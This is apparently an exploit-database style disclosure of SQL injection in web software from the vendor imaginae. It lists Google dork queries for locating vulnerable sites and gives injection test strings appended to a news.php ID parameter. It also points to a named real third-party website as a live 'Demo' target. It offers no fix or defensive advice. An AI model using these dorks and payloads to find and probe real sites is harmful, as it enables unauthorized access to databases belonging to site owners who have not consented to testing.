[+] Title: imaginae SQL Injection [+] Author: h4shur [+] date:2020-11-08 [+] Vendor Homepage: https://www.imaginae.it/ [+] Software Link: https://www.imaginae.it/ [+] Tested on: Windows 10 & Google Chrome [+] Category : Web Application Bugs [+} Dork : intext:"CREDITS: IMAGINAE.IT" intext:"CREDITS: IMAGINAE.IT" inurl:"NEWS.php?ID=" intext:"CREDITS: IMAGINAE.IT" inurl:"php?ID=" ### Note: [+] Add the quotation mark (') to the end of the link : * Target.com/news.php?ID=4' [+] First add "and 1=1" and then "and 1=2" to the end of the link : * Target.com/news.php?ID=4 and 1=1 * Target.com/news.php?ID=4 and 1=2 ### Demo: [+] https://www.maranello-service.it/en-news.php?id=ART0000000010 ### Contact Me : * Email : [email protected] * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r